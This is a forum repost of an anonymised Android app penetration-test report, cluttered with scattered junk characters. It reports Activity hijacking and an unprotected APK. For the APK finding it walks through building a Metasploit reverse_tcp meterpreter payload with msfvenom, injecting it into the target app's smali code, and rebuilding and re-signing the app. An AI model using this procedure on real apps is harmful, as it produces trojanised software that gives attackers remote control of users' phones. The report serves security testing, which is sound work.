原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

8 C/ k s0 e3 x1 I5 x$ p 2 e5 P3 a( P9 }# h: B% g B
- z7 c. \( Z2 N5 X3 r4 P1 J. F - |, \$ f- q; W- `

5 ]" u; v$ M. F , a9 z7 E6 r- `' {6 ]) ^ 文档编号： 2 g* F# M- J% @0 O( j2 {4 G/ B( n, K: U

: S7 R' B M7 {! Q6 M" p$ }- q4 ~% t$ G8 t& k( m " N' V! P2 ~4 e2 j# P3 @ 1 y/ Z; g( x8 b8 ]' y

9 F- {8 v0 w/ s1 E2 r 2 o9 a& a' m7 {: q, {9 I% @- O + [7 a8 q, V( ?4 K# m( r 5 c R: m* B0 z! Q4 G+ @8 H

# E2 ^% K6 c1 u5 n7 s% k/ b 6 [8 |! q* t1 K, V, i8 S2 l ! e1 G4 I z! Q" [ ' l6 f( `- R8 Z# |* F

# G" H6 L& Y/ W; H+ H& f; }3 \! f( t 0 m) k+ M) H! Q , t$ \# Y. o% A5 b% a 6 k0 \5 ^, k8 f: }3 A" l! T, c

! j4 m% @4 h3 M. v4 Y) y , l$ N0 a& O; y2 [* u, C 1 D, ?. S& W) P- i : C5 B, p) I7 z

; S/ L! Z, o5 f' Z * e8 D) X8 [! P) R9 _) v) D$ x* e 某某某APP渗透测试 ) M: G/ v5 o8 I. V% k , \/ Y, v6 a8 P8 h* |- |

# M" t/ D( \& i( s& B* R- ^+ m4 S( {0 W Z# `# U " G' `9 m7 n- F' a8 q7 V' ?1 o, H; u+ x 1 C7 g( Y9 x: ^; ]

+ Y: E, q2 n x8 g" M# K ) ]: b7 E4 M9 A; [+ @ + }2 E' E1 ?! I$ {# ~ 9 W. J0 A0 J8 a0 \5 \ l

3 \9 w7 U) n/ B9 z, }* t2 j" B! C8 D) } , b$ ?) v/ T8 v5 w5 L! b+ \ # @1 e& @0 i1 \0 v% G

. X) e6 w/ M! H . F6 O( U/ y4 U9 m! E+ ] 7 f- }6 {8 p$ g; J8 j, J5 k7 ? # x2 r8 b" B0 m' `- B; v

5 `9 N; ^: ]- {2 J 9 z. k1 G/ `! |9 z) @; P* N 技术报告 + ~" E2 Q' e3 [ z' W; Q ( y. X9 X# @. W: S3 Q% o- o/ `

: n5 Q, t9 G% }( X . H8 Q9 S& V6 b! u" Z 2 x$ I2 k! N5 [ 4 }7 u2 z- o: r0 b

! }9 F" a2 \4 B# p! `4 N5 S , o( N0 c$ n/ F# V/ ?2 K T 0 \ `0 \3 X" x4 i1 {& s / I9 f0 r, c* L- i2 @2 ^

8 h5 h2 O3 T ^; j0 W3 r+ z' y. J+ v* }, Z3 v% f5 P& |/ c& v5 r 2 b& n f0 R" m0 u & j! J% U8 k. R! `7 t

2 n* j j4 V; d, R# }* U- y, i' Y4 ` x z, n* e! w+ k. V) m @ / g$ I' W( U- r: F2 P+ _. Y

6 w$ {2 f# H6 n9 u& h1 F7 v1 V; g , k' g# P4 G, @% O! o* G! O4 H ' H4 j5 {$ @5 ]3 @2 h/ F. ~

# J, A# x- `, j) x " Y% ?, E( v6 O- z2 R: C0 R. N- O ' t) V+ ^6 V' Z* {" T3 ^ , c: u) U# P( B4 z+ b

/ _/ ]# L/ I0 W/ h$ E; p" Z 4 t! J' M2 G- ^( O: M' t 4 G+ u5 @, H- l$ C: i t ; J( T5 n5 ]+ G- Y

, H: _7 b0 y% v3 ?8 T$ x ) @& K& i8 I' z 9 x' D, E. R# V$ i; p! W% N; J* E 8 m& k5 P/ K2 u9 K% y2 C8 d/ t+ P

6 @3 T; c! e% o: h2 A5 y 8 q) t3 _4 y# N0 d) | 0 ]$ C; }" l* {) f. s# \ 8 r5 z( i; U2 W, B6 a8 Y2 e

1 F, D6 W: S; O ' r1 {9 y9 k" F- f3 q$ K 8 E! s+ Y0 w8 f2 k8 K$ p" g8 R - u; i3 R: ]+ m. H0 Z: o

8 L1 M) b9 A( o+ {+ R/ u# n1 N* e6 {& X+ e3 \# q - d5 h! }" N& N r 8 [4 x: a/ G5 Y' }. j

3 i3 W$ h x; h q" w+ C4 D0 X0 _1 j 1 k5 P4 F$ o. R ' `3 w' ?1 {& z3 u0 l! p

# ]6 V3 S: Y0 \9 O' m . s$ @' Y z) _1 W 7 }7 t2 C, Q4 n1 u+ b* b7 G& N5 K2 z* }5 t( `

7 }) o: X5 c# `) x3 Q2 f. D / t/ l- d# ~* O0 A# R7 `9 {( @- ^ 8 @9 `# N3 y( S! \. t- A A: n5 u& O3 ~( L- A5 q$ \

0 I; D: X2 R2 Y3 r" p. a, g6 P+ B/ C4 B! h: I# y5 P$ h ( r; c% f& z0 R- U ) e6 p- E9 \+ a; y: F

# ]( w2 S& \* C0 Y 8 P, Z+ A" p8 c. p2 t ) ^, k( v$ t4 h& B4 ~% b& O f( y . l0 ^/ B$ z* h: d* H6 P m

7 W& r( M/ y2 h$ m 3 ?# q; ~3 Z5 i8 b( | % r: n4 O2 P- _: a7 ] & n! N6 Z9 t2 W- z7 `8 i I3 v0 ?

$ k1 L2 @% [* F* K! k( o8 F; K1 M 7 d9 c( l7 u; \; D: W j$ H1 ? r7 l# ^5 D, P$ t Z( m

- `* b2 G8 y C' R" I' U . f3 e4 L5 s. I7 p 二〇二〇年 - P. L/ n- U. m ; }4 F2 _ M0 ~2 l5 G

. O7 {+ Q( s, R+ T7 q3 { $ ?4 b$ Q# D9 S% C7 F5 C8 B& B/ x 目录 + N" B6 c! ~) z9 |% d/ q9 @ % Z4 }, y! k1 K/ k

r" ~; a% o& Z. Z: I2 e$ g; k( E2 K# `1 M$ t" [) p2 z + b& D9 i6 E% }8 W0 c8 B, ~ + H* N% Y7 `9 r2 X9 K

4 I z* x& W: S g" {: H- e 0 f* C8 T! A2 e% G6 e; Y$ R 1 概述... 3 1 z3 @ `5 L8 E4 C/ |/ r4 M ' |8 y1 x* u$ U* e

% s4 k% j0 g1 @) K, Q4 k6 y; L+ e. G2 [5 s* o1 [9 l0 { 1.2测试时间... 3 5 E0 j" O# ?1 t5 x! G: j' Q 9 \- G7 t+ F3 ~- `

6 O+ K$ [8 c( n: I' H, R0 \; H n. \' Y" ` 1.3测试对象... 3 r+ w; Z7 K( P+ R5 z" Y! D 4 X% ] |1 ^; d# A6 K+ ^5 E$ A

; x: ~* H! }, c0 w' _1 M" k # V3 j2 v8 ? z6 o1 p' e7 R 1.4测试结果... 3 0 Q: Q: Z1 c8 y- d * F1 q! i1 I" K+ ~

! c* d8 l" L0 z2 M* V7 Y # e. R5 s, `2 \+ z 2 检测结果... 4 $ Z3 | O) V) A% v9 w: E- d/ p 7 o2 D* ]0 h+ m8 d

7 f! ~# U1 v( w2 Z * w+ K l- g7 y9 z6 w 2.1 某某某... 4 ! W4 V: M7 F# f' I) G/ K( |+ P6 g 5 y2 y/ ?; W4 ~" C. J1 C

R% x m) t. ^$ T2 \5 q" ] 5 g# q1 T. c# R" Q8 |9 v 2.1.1检测目标... 4 : B$ [- A M4 M2 ^$ N0 V1 M% E: ]# D7 K) z z

|- o: r$ U' T; b( A2 K ( G: E) \) H& a [: P# a- O 2.1.2检测结果... 4 0 [, k2 O1 z# C) @/ z ' V# g$ H6 n# a1 G2 S; _

5 d8 \* @# @* p2 E8 Y( ` 7 Y7 q: {, X/ b6 P2 z( a+ J 2.1.2.1. 4 & D+ y) w& s* E9 H& t $ K1 |' h" _. E& B

; ]) O% b% G/ {+ ]$ F . M6 u# J, R8 J" _ 2.1.2.2. 6 J* E2 r: U9 r4 u; W : K3 K5 ?6 O4 f, K

9 P3 o- h7 l, T/ M" p4 l. Q! e5 r4 @6 |3 `7 H ) b. q5 g2 T: ]1 Y7 X- |# } * U7 E$ V. h- t1 w: c' D

" G( [- ?5 x9 Z& [+ ~* D 9 ]5 n+ W! ^0 T D5 U 1 概述 ' r3 \6 x+ ?, C( G: ], t; P `1 A4 O- p$ E3 G: |* h4 x

0 W: V0 w. y% O8 ^$ ~; W* ^" m 1.2测试时间 ; w! N x3 g8 w , g0 g' v# L! S" _+ t- j

$ U' @; w% e- W. u X 2 S: E0 t( A( O; E, Z& F0 V9 \| * y( e5 S+ d, ?7 ~. v8 c 9 Z v2 A: G4 P/ i$ z, A9 y 渗透测试时间 " S4 n' @, T5 o( t5 W. @ M; V m; o1 v0 P! s7 C5 D ( W$ b& s. Q8 a" d: }" g8 {; q , P8 g6 b$ V0 i5 v/ p
+ O! T a: A) _! a2 D7 S) R$ E l0 K0 K# C5 g) w: C+ y / g- G6 t7 ~8 S D/ A : T( T7 v2 Q8 d 起始时间 3 I, S, l/ D% O3 B& e& ^ 6 ?$ \|" D9 L$ b2 n " p. V6 b6 w3 E# V ' }, {( x; g9 x1 b	4 F' o3 N" a0 b( W8 V# o . R2 L \6 C0 ]& h 3 S m g% F& W7 t( J: x: [0 k1 _" r5 \|( M; e; ^ 2020年4月6日 8 r; V0 R; R+ z( J ( W7 m! \+ U7 ~, l8 q W , I1 S$ \0 Q: f# k: B; s T1 x/ O" \. E+ ~0 z/ e7 j$ {
" Y; U" c+ \- G 6 s# Z6 m$ G% g. Y & i) F$ F- ?* N6 H- S/ l/ I# `6 D& o& m 结束时间 : e( Q8 A2 H( a+ k/ }% r: k - j) X- E& Z) E$ L ! B1 [! M3 u2 g i: H4 _5 Q ) C8 {. y2 H8 ^/ M6 u- w	1 _, L+ d" ]! s ; @8 s' \|' v3 v " A* P. F; s# j0 Y 2020年4月9日 + P' }/ g+ p) u8 i" k) @+ z- k 1 [* W2 C- T t& q; p! r6 G1 `% {6 ]( r 4 o" D: Y1 V5 n" Q / l2 l% f3 c4 T; z* g

- _8 l `3 |9 L ' t8 ^( f) l7 v* o; K 1.3测试对象 / t5 A {* |* U- z2 Y: k ) n+ k% M; | T0 W6 x9 T

" B% k; f" t. n1 K1 W% U8 r* c7 f + ^* X: A! b& u: I t6 { 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： & H* k. L: f; K, j0 Q! X 7 F$ y9 ^- L9 q

, H4 X# L: T( K# w2 h, _' F2 Q 6 R; C8 E. f& V0 A6 [ 表1-1 检测对象 % ^4 F: Y3 O4 v. n+ T - L% w; a' D. X& i

; \|4 \0 x. E( [' Z- [2 K ' ]! s9 h6 N' X* \|- V& ] . j) k6 s! h* H# B, P( ~ ) n! h8 z$ P7 z9 A5 ]- h0 L/ }$ c0 M" W 序号 6 L7 j) I! N. n1 R. e ! z! A3 y3 C8 w: h2 @ 0 ?& {" U" T$ y/ k" D- I- Y% Q % C, V ^/ {% r( p; c' U	7 T& _/ \|% S6 Z, u4 V # C0 c5 ^. v& ]9 }- b0 ?/ {/ F ! G& t( M1 }! k" X( K% m! J9 u4 ^$ G7 x, n2 ~ 测试对象 . g( G$ q7 }" `5 K1 i" V: G3 F& q5 R7 R0 ] ! \|& p( J" C( b3 \* f: n * e( u! v* w- r2 Q* D	& v1 D8 W3 [; g+ N1 L * v; W$ }# B$ T/ B 8 z+ g9 ?4 C5 B8 x% t7 } 7 N* Z) @5 t- b! `$ K, R7 \ 测试地址 4 X. Y# u( E" V4 Y( ?4 Y + H2 M% `" E) I, \% _ j + d2 W( \|9 \" [/ P; m" P& C / x8 [8 `* d8 s) a- t8 H% q {	0 U, w" t A2 W, A8 U' U/ Y0 d . g3 H v4 p$ ^0 w3 c: ] ( M, D4 ?+ F5 F 8 R$ U' D# k2 q0 M3 \ 安全漏洞 9 A g T- A- m& ` 8 S7 C9 i2 s4 a# J! j, D 4 W) x5 U" E' M3 m1 T% M: o % F! Z1 c5 v& d' n
4 C1 e7 a" S) g. ]4 C, P & t+ k2 [2 W3 _8 E: U3 C. t % _6 ^' l! e; _) C4 U) k $ G, n! q- B8 x8 s3 C! M 1 $ p( G; j- K$ C. A5 I9 f- {3 w# \ D3 S( S9 d G& i6 \: } ! p: [; m3 C5 N7 \; d ( z% J" R- A( y$ d0 c/ S	" m& X+ Q- b6 o8 I; h0 z2 i : W9 m+ \|, M H. a. m* w , b7 g8 \) @! O" i$ _ 7 U( H- a/ E& M: W 某某某安卓APP , H3 X% K0 B9 ^' n$ J5 `& X5 T : A) Y( N7 g6 z* x4 ` ( S! c9 k) I7 Q# b$ G3 y 7 V* @" a3 m: ]+ j+ X	7 V3 w8 f* z' d- e0 U) m ) @6 N" i6 l) A & x" X( R- l9 K& g A! t$ Y: [ 7 Z. m8 E1 V! G3 O' v2 Z 5 }+ L" ~9 e$ K B y: D# }2 I T" X7 a6 l1 K0 d # a& g. }+ p/ G; n( \|7 U0 R* A" a3 {: \% _" b2 y$ l	! [ Z: `9 k! M9 _9 d0 O 1 E% r# S7 m. J * d# i/ g: v+ o& \( L* Y: A + m) @0 K. l) G- ]2 G- [( S {9 \| 2 # [- t- s: s- t7 \# v 2 o9 \|3 v9 M2 a; X9 h# Z# ] ( Z0 D' B0 V% t1 J% I; V& u6 C 4 p2 H: z) h1 G) }

+ o# E0 l# t& z( C$ N1 w7 K 4 r" B9 v% ?, y& P, a2 L% ~ 1.4测试结果 5 f. \ W* G. _5 v8 q0 C; j, F 3 H5 l7 p9 j# N

J: m8 C$ _+ j4 z 8 L1 s* H+ |7 f, f a# P0 w* S 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： + S2 K/ d4 r# u% H w # m+ v! `) S+ C! g! P

3 b# E7 [3 t" r3 Y3 L/ g / ]8 `* x1 @& R# X3 K- U 4 o! o% K3 v1 q) o) d0 W" ]2 @( L4 }. O0 z

3 g7 ^8 H8 @0 d2 R7 Y5 A$ K, ?8 S) Y - `* Y/ T. h8 f4 j; L7 E1 ` 序号 6 s0 w0 Q% O0 X, Y& r& R% [- C/ T. b: V. w) d) u

+ ~( S" E1 r p/ ^: m# v7 Z, B) a4 n0 N0 j$ h4 j 系统名称 8 h# L# o' {3 d: ]: ], G' A# i3 {2 ?' R! T: U- ?/ D6 Y

' `5 I/ U5 z, g" I6 i8 c( X, \7 P$ ~# i 漏洞名称 , x- r1 m7 |5 m0 `, z R , m" U( a# I' h5 k

. E! S& J% L+ V% p& @ # e' j8 z" T' E, o& J, n 漏洞危害 - R! e2 I$ O9 \5 {' O" B+ d: W- i : @, r; @( T( m; O

* h9 U3 F# \3 M# R 6 r8 e& O( |8 }$ s* A# T 修复结果 ' L) ?( _, k5 ?# z* h; P / D, b! j. j) V( m) U

: o0 O) r* ]0 P3 ?% P- G( U# e' z u6 k" D) A1 t, O& | 1 / w, A- U9 S8 ]$ x- M; d$ c6 n# s ) U6 k$ g- |4 H V/ {; w

$ _! n1 P. b+ ]) O* _: l: w 9 p D8 g q: H( }6 b# [ 某某某某某某APP : F7 G1 X! P7 d# E$ Y' L : B& k' S7 f. a; U

% i" \) J0 f. |4 i5 j* e- I( A ^! b: h0 H: A% t: B) b7 W: r Activity 劫持 ' P, m {, x$ O) r' {9 u9 M 8 c9 c+ W; u T& ], @2 N

. |4 M9 O) ]3 T$ I 6 C% i: @% j. ^& v " t6 b8 X1 d% Y* f& X; X7 o @ 3 G4 b2 d5 a& A$ @0 w& s Q

9 \/ u/ l8 d* g" ?; G) K! x0 {$ L0 k* c& J 高 * o$ p* S1 z q; W% v+ [5 v$ k % P7 a- `2 g6 q; \+ B

& W$ u' g8 y' D7 V) Q+ p" @" R8 H; J& n7 u! |# V $ T$ Z: u5 \9 A; }" r+ m T& a" l1 r3 f0 T' U

) o* O; J4 m/ s) L# o6 G4 M0 x " Z% C6 }* E- w 2 0 R/ L6 o- S8 A; |2 k, Q) G * ?+ a8 ]! _. r4 g) ^

) F' q" n3 W, [$ B% j1 Y& t : Z0 r( v7 `+ N6 r3 l9 J 某某某某某某APP ' M5 S# y+ y; O4 u4 E& C , a6 n. s8 }! l! J! e1 V

$ ^# X0 W& [9 @/ f/ a 2 _1 k0 C. R) j. s' L- M2 ?0 I5 X 反编译二次打包捆绑木马、篡改APP代码 . N2 Y7 q0 e8 L4 a / A2 ]7 P* ?/ i2 V0 f# t0 ]

! Q! x$ r a ]# x$ ^; P W p: Y % `0 V( _3 |# A9 q% p5 _9 Q) H 高 ) a/ q* J, `& h* v( ` r+ Q 5 p( T: B! V' v* y% {3 k( W

. Z C% Y/ ]+ C& U, o" O4 v& T / n g* ^) ^% c& Z - m7 N; G1 W# B( h/ { ) t) P( ?+ T; k. `5 O7 i" L% i7 x

8 ~$ O% W3 I9 ^$ p ( |$ N1 J: Z# N+ H ( s% r0 F# }2 `1 T9 a4 e! |$ _ , R/ X' \% S0 c3 L( I, X' E

5 Y/ C& Z: i. T% O1 V( g; ? 7 ]& C L+ c, L1 D% c 表1-2 测试结果 . W7 P3 ?9 t# x5 u% u/ r5 T, {5 x' F9 L- T8 C; x

" k$ q% H2 A% a# M5 ]3 @0 t6 j8 v0 R: X ) k' ^. H2 ~% T/ F " L9 }9 r2 d3 U% n. T5 p

5 @; Z$ ]* D/ a; n0 o7 }% y& [ , R! |$ m/ m# j" M& G$ Q2 y( a 2 检测结果 6 @5 R; Y9 e6 S- L * O. `* }# l$ q- O3 c* u

" N5 p' ^" M" n- d; `7 u4 J $ [* z. @" F1 I- a- w+ A 2.1 某某某 4 I8 b1 _; _* d 1 [9 u3 B. S" Q6 q6 T

1 F. i. a. S. w$ Z. s $ B4 o9 |1 y( t2 A' L. x 2.1.1检测目标 . n& v/ @! m& t ? v) H , U( y# x8 Y+ A2 s0 u

2 c" W' H- p. I/ s0 I" k/ u) j2 u# @5 j. y6 J6 s/ X& N) d 目标地址： 某某某某某某APP & z9 |7 [- U' y. O" H* A, Y 1 R* a4 ^1 z5 w6 B( \ U1 Z6 {

. \( ~1 X0 q6 M ` ; E6 I7 E/ _9 Q1 H 2.1.2检测结果 . t `: H$ ]( C0 E5 S8 @% H. L8 k% g9 j2 n

9 A9 ~, S H" Q* b; ^, f . S" k" O4 V# [+ y 2.1.2.1 ( {0 t( A) [. P0 \) ]4 t ; E6 F, ?0 H& d: ]) X

$ {6 _1 ~1 s& d8 k' u2 `7 N' Z- W5 j, W9 L6 H6 Z# g! F6 B8 b 漏洞链接地址：某某某某某某APP 6 ]0 a/ ]: U: r! X7 Z9 n. W1 y3 W3 C0 `( s* ?- H! e0 N1 T

7 @9 I* y( n- H0 B( v1 [5 S; H; t0 R$ @% M4 d+ X0 R5 V ( F7 W% H3 W# R4 c! K+ M2 p 9 j1 V5 o8 B& c9 h- W9 f8 w; \3 D

$ o. c7 ?% b2 C C2 w/ _6 J/ |% F+ s* J4 J" b7 M' I' ` 漏洞分析及取证： 5 p5 V$ C L. K a' b, {8 A5 v: y9 o t- `4 i4 t

. u4 \, b S( u" O9 G, o- c* Z1 l/ y& H+ D- ?- H 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： , `' `* _( y1 j0 G + F4 U& ~- F$ v! x

0 d& X" c! q$ {; f- G. G7 [/ c - ?9 J6 j3 s& J/ }6 m5 w 4 U* z8 y' F5 u. p 0 y* J0 X2 h9 C, C+ H, _

# {1 }$ s/ E$ W) S$ d- f! B: \. R+ B( E# a 0 h! K1 l' d O# c ) S. U" ~/ u7 G9 U' z' P( D6 r: Z

6 r5 j @0 r) `( a 4 r$ ~7 F. \( q- q* V7 c * {4 ?- L. o6 c- d+ Z% {9 F ( J% B; \2 H2 O8 [5 |

7 I5 ]7 Z3 f; z# I r6 T3 k2 k- N$ i5 k) u: k! a ; Y3 Q0 ]$ m% V* ~ M8 R ( ~9 Y1 j0 K- Y+ v" V0 X

' k* h& E: B+ Z$ K ; V. Z! y7 @ e2 l" J3 |: Y' j , v0 G, m% y" t& a `9 Y4 ]1 g! T% x7 V# |, {; \! Y; D

9 n6 g+ b) l& o+ } M1 U8 b 1 n7 h3 T8 O& K& C+ r( T: [ 漏洞危害：高 1 x; ~) x" ~9 S2 L0 d0 A & _$ m1 Q2 {( T. Z. g; I

8 _7 C, ^ H+ n* P3 l7 I8 ~5 P, ^! g/ C* N / M/ n$ `5 X( y* j+ }) M + T& Z9 x6 F$ Y0 ]5 X3 F4 s0 Z" E 严重程度 5 b' f6 m3 w; n' K* u* L1 o7 h 5 S4 Q9 X4 S, V6 n1 ` , M8 ~( @& U0 K+ Z' H" ~3 e$ G; K( X% Y) a. p	! A0 V( r, n' S# p# S* j/ h ) B6 j7 a: D1 \|1 M& E% I * ?: z- O9 ?. c" I1 j % \|' }6 E9 l. T* {1 N- O 高 / {) ^1 C, U" [- l ' R' [8 z! s0 X: R6 D1 N 4 o, q" q, ~4 n- v7 w& r4 J: a2 L% n( y$ x	' m* }8 C- S7 w x/ e( k " H+ w( Z; g5 _6 h/ x: m) b ( r5 k9 g! R" i" f . F, l% A- d, ~, D) f5 U9 f9 S ■ " f- K% E- h7 }1 n6 o, Y+ S 2 _( o0 [/ C1 i2 _9 q( a( L$ i , Z- z. R5 B/ U: @" Z# G7 f9 o% K) ]9 v7 ~( }	/ N* Y- g) h% y0 M0 R) `, V/ C4 Z3 u$ D % _6 Z2 f' _! \|' L# l9 g 0 k( x3 h* e( c/ W$ N 中 " _# V; r/ i0 G ) k& _: K' c# J8 l 1 H2 b4 d% y. b- X 0 n) d6 N6 ]9 j	/ d9 m" b$ k* `( u- k/ `" l; L# a% w7 T% U1 j 4 l' \|; \6 F7 \6 t2 Q 6 o: \|) w: t z0 d+ e Z , O; F4 r8 \|6 O$ s a6 y% q / B+ H: @' \|! c0 R3 i, ~ , o3 h8 F9 O# G( e. p, w) G# h- \|" K- B8 _. \2 T	: G2 M- t! G$ E3 j% r) k H* F& e- T# M+ d 9 t& h) j* V8 Z) J+ M7 [1 E# \|7 R$ P' q' K 低 4 \$ _& r/ g6 u) T8 Y, u- l 1 y: N0 a% s# ~* I2 C - @! q1 d ~1 F' I( n7 ~& i " w2 i3 Y+ I/ A: z- z	# @& q7 M) Z4 E3 T# F! z & A8 @' U- y: w/ P - s6 t1 P Q+ P 1 d7 m d2 w v% d# R5 w8 m+ p3 E + a: t X5 T# a( X* S. h5 f# j4 ? ( X% W m, q7 f$ Y; @ 5 M/ S& R0 ?2 U/ e i% V! p0 {8 [ 9 s# q# T0 E! A

& @9 D: L3 P d: L2 t4 V" o2 ~7 S6 E0 s5 E9 k' O9 [6 @ ) J7 g5 O% q8 W6 H 1 C$ x7 T# u/ V& V6 [* D, ]

; ]0 Q: F. D% D ) ~) Q& R C3 G$ g 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 & r: \+ X1 W; X; ^' c/ c: m6 u * w6 b, F3 D7 ~ |1 Q

; U1 S5 {8 X6 ]0 ? L( Q$ }. _: b1 [# C3 t5 n8 [$ M $ p* q. L0 m9 V! F. G$ t 0 L5 ?% j& V3 T7 z% u1 `6 {" C

1 ]. d' f3 C: f- ^5 Q: m$ C6 Z+ f2 b& J / e: n) ?; q1 X8 s, G- C2 L3 w, @+ H: W0 r9 S3 S( R# _

/ g8 y; }1 Q& L % g2 `; |% Q" O0 Y. F& n ] 2.1.2.2 * G* v; U5 K! c 4 ~6 T5 E8 Q5 x5 k2 ?0 H9 U* n* J i

( |, x4 D% m, |( ?6 E ) ^# {, i; `. _. M5 ] 漏洞链接地址：某某某某某某APP ' N1 l) c9 u. j; l, E, }, O * y3 B& ~" @2 h

m4 d8 L Z+ ]4 d : m$ p ^2 U& n5 ^- p 漏洞分析及取证： + f' M! k( q8 U* c1 k8 g9 V - \3 Y' R4 z" L. q

4 ^- G: q/ Y. O$ X4 a' R$ d. h6 j) R, \) g0 Z0 x 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 6 n9 ^+ s5 e9 M* y # |1 Z/ e9 O1 L

h4 y# @/ `6 l6 |9 u# T0 q 3 i0 o; l8 H. |6 S8 i# b7 P+ [ 用Metasploit 生成木马 apk $ I) b) I" T3 n/ X * ^% W6 k* { V$ P: x0 _/ s1 @* v

+ S y) `1 G/ w" l# Q6 v5 r# q + W0 k2 v1 c& G( { \ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk * J, k% J" O. P& o8 v 2 y, w* @+ |; U `3 ~3 F4 f8 ?# V

, m/ ^: `2 a( _9 {7 C: C ! d3 x: J' t; \3 m' d3 n% t 反编译目标apk和木马apk " f2 Q" e, \6 R5 W3 y& s : W5 {6 V4 t, d: N& v- Q

5 w) k J' l- S* g; _& n % I4 e( \. B) T% a apktool d target.apk
1 ^# y' ~! k' u* }- y# ~9 T# v) J0 ~5 O4 h$ L apktool d cockhorse.apk 5 a8 Z; ]+ o% [, ]: F+ Z/ m; Y5 d8 ^9 I B1 @+ J1 v" e! S* Q- r( h

% T3 C+ A3 x' k ( f5 j4 I( F2 j7 G 木马 apk 注入目标 apk , c# W( G9 Z- `9 H9 e9 ]7 r ( s: O& b u C: Q/ X7 q

* H% P, d8 P& U$ n) G * n0 S) r) |9 f: A- y 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
" \$ K1 I' u% g+ p 9 o+ q7 U3 J$ b$ @ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 0 o# R" R5 f$ Z6 W. N# _ 3 ]* n/ a7 z; }

1 g' M; c. G$ l. z % j- w7 c* A e' [7 f; M" p0 l 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 Z3 l+ \& |8 m! A4 y- b$ a3 H x% A# e0 k4 t$ P- q( R

4 V: d% m, z* i# j8 K6 F , O; l9 n! H# }* X+ ~8 l 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 , C8 f0 W4 ~' V9 d) f, A+ Y' W v H& Z, I+ J1 N+ X+ M

! u3 B# a) d* V7 n# l: `& [3 ^! o8 g, N: Q! @2 q 回编译生成最终 apk * i4 |% o7 w9 H' v$ ~& y 2 L- V; `2 G- Y' v0 j3 e6 b

1 c! W6 v0 ^- K& e9 Y$ \+ [! T' A: S ) }. d$ D7 J5 }- [ 重新打包 + Y& ?7 S ]4 P" j" a# ?6 j7 Q( S2 I7 H1 Y8 v" G7 h

' g, D( D- _( b9 r# j% Z7 i ( B \# S, U4 S apktool b -o repackage.apk target_app_floder / o8 a) y0 O( y 7 C& ?! H. _5 T

/ r, {$ K" ] q: G- { " b! X' A6 U% T& g1 U 创建签名文件，有的话可忽略此步骤 - ?$ K: p% ~7 `6 w' L. S8 p; @# b0 t# M+ P; X6 p

" Q2 L+ Y$ r! Y( ~7 p. B ( d) _& [2 F( |: l/ z" p* l keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 3 v: ~7 t+ E3 }' H% Q. N5 Q* a/ @ ) t w) f3 s' R7 S2 [5 N- ~

V7 e$ p- o1 M& L " l& k d7 J# O1 M 签名，以下任选其一 9 w" v# h; U: { - n& l) i5 b6 f

3 P% \/ x- v. E0 K ) m7 l, r2 c3 w) m& }3 J jarsigner 方式 9 U7 w J ]- U( c4 W6 y6 Z3 y- a& d J5 n+ R( T+ j& W

, v4 _. E, `; x8 ^0 H9 _ F/ M( X) u( X/ f& y) ]8 ? jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname / E! H, ^' B7 P/ U6 P* Z * N( g4 ]. C' z# E( T& f4 z8 R

+ ^" r: Z: R8 |" g7 t6 o3 g# z2 i9 [ ; z' J8 N: L0 I( d apksigner 方式 7 J! A6 D) H6 Y# _& a: H# T , ~3 w! `2 v2 H# k1 h) E" p1 G7 C

# A5 r3 }) ^! I. L5 o- X1 \1 g ^% H, x& ]" r4 n apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk - w" d' p* J; R- p, A7 a6 S# _+ F/ V. y% w2 O) r

; L h% O$ u5 ^. R; B! @ 9 y) T) y" r, [ 如需要禁用 v2签名 添加选项--v2-signing-enabled false ) k* e" C8 {9 h# i( t4 ] 9 I ?4 w8 X/ i5 X9 ~, Y \" W

9 B" ^' {' @- z- b3 _6 v( G0 U+ d1 A: w) R 验证，以下任选其一 3 c% H' P# V. k ) j* O! g- p3 Q

4 E, G6 k; t) m; F7 K% h 7 E) H# T' S2 \0 o0 H) q. G0 \ jarsigner方式 - {, t& c8 c2 r# J2 N' i+ H+ D; j4 P5 i) J& y; L0 z7 H- v7 M0 Y

+ V- X/ X& u& w0 d2 o ( E" F" C5 m3 m" _ jarsigner -verify repackaged.apk 9 T3 }* e0 `/ X: Y1 q+ E . B3 H/ z2 g% [6 y# U5 u

) |% v! D* z% k6 N; p& f- ]0 v6 z: Y( w% u! y1 }7 d apksigner 方式 ! @6 T& T9 a f* D& g0 J6 B( L" Z # g9 ?1 h: y6 a

7 o; g9 J. n; h : T1 u3 K. }0 j& F! ^ apksigner verify -v --print-certs repackaged.apk * W" r9 Z% Q/ B' K& S( q$ T , q0 {2 P4 Y& M, R9 e6 {3 u

( P6 q! G" {5 x2 x6 @' G4 {. o , V) c4 K- T" G, E3 F/ u* h4 q4 } keytool方式 C; k, ~' x6 k: [. n7 @! D1 }- |( F7 Y9 O Q6 z n+ i/ E5 r

+ N( M; _/ }0 o* ^8 ] 6 B3 ~" N5 k. u. S) C keytool -printcert -jarfile repackaged.apk ( {0 K# I7 \2 q1 h, Z3 D. I: q: H* ?# P1 W6 g# P% P

